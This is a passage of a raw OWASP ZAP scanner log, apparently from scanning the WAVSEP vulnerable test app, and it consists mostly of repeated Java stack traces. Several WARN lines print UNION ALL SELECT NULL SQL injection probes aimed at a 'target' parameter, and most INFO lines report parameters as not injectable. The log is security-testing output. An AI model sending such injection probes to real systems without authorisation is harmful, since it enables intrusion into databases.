BY 5147# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963089 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963090 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963097 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963099 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963100 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963101 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963102 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963104 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963105 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963106 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963107 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8963188 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8963610 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter '__VIEWSTATE' is not injectable 8963611 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8963873 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8963963 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8964124 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8964398 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8964399 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput2' is not injectable 8965010 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8965016 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8965422 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8965424 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8965808 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8965816 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8966224 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8966228 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8966622 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8966625 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8967053 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8967059 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8967586 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8967597 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8968380 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8968389 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8968805 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8968807 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8969205 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8969206 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8969610 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8969621 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8969997 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not 